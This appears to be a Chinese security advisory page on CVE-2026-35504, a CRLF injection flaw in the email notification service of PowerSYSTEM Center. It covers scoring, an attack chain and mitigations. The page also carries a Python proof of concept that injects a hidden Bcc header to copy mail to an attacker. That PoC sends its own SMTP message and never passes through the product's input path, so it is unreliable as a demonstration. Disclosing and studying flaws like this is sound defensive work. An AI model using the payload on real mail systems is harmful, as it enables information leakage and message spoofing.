CVE-2026-35504 CVSS 5.5 中危

CVE-2026-35504: PowerSYSTEM Center CRLF注入漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35504

漏洞类型

CRLF注入

CVSS评分

5.5 中危

攻击向量

邻接 (AV:A)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

PowerSYSTEM Center

漏洞概述

PowerSYSTEM Center的电子邮件通知服务在使用SMTPS通信时存在CRLF注入漏洞。由于未对用户输入进行充分过滤，攻击者可利用该漏洞在SMTP头部注入恶意字符，从而篡改邮件内容或执行协议注入攻击。该漏洞CVSS评分为5.5，具有一定的安全风险，建议尽快修复。

技术细节

该漏洞发生在PowerSYSTEM Center处理SMTPS通信的过程中。当应用程序构造电子邮件头或正文时，如果直接将未经净化的用户输入嵌入到SMTP流中，攻击者可以通过插入回车符（CR，）和换行符（LF，
）来中断现有的头部结构。攻击向量为邻接网络（AV:A），且需要低权限（PR:L），意味着攻击者通常需要接入同一网络并拥有一定账户权限。成功利用此漏洞可能导致邮件内容被篡改、敏感信息泄露或进行SMTP走私攻击，影响系统的机密性、完整性和可用性。

攻击链分析

STEP 1

1. 网络接入

攻击者需要接入到目标系统的邻接网络中（AV:A）。

STEP 2

2. 获取低权限账户

攻击者获取一个低权限的合法账户凭证（PR:L），以便访问邮件通知功能。

STEP 3

3. 构造恶意载荷

攻击者在触发邮件通知的输入字段中注入包含CRLF（\r\n）字符的恶意数据。

STEP 4

4. 协议注入

应用程序将恶意数据拼接到SMTPS请求流中，导致解析器误解析，从而篡改邮件头或内容。

STEP 5

5. 达成攻击效果

利用漏洞实现信息泄露（如抄送攻击者）、邮件内容篡改或中间人攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import smtplib # PoC for CRLF Injection in SMTP Notification Service # Target: PowerSYSTEM Center (CVE-2026-35504) def send_crlf_payload(target_server, port, sender, recipient, username, password): try: # Connect to the SMTPS server server = smtplib.SMTP_SSL(target_server, port) server.login(username, password) # Malicious payload injecting CRLF characters to break SMTP header # Example: Injecting a custom 'Subject' or 'Bcc' header malicious_subject = "Original Subject\r\nBcc: [email protected]\r\nSubject: Spoofed" message = f"""From: {sender} To: {recipient} Subject: {malicious_subject} This is a test body.""" server.sendmail(sender, recipient, message) server.quit() print("[*] Payload sent successfully.") except Exception as e: print(f"[!] Error: {e}") # Usage simulation # send_crlf_payload('smtp.target.com', 465, '[email protected]', '[email protected]', 'user', 'pass')

影响范围

PowerSYSTEM Center (具体受影响版本未在描述中提供)

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用受影响的电子邮件通知服务，或在网络边界部署防火墙规则，严格限制对SMTPS端口的访问来源，仅允许可信的邮件服务器通信。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表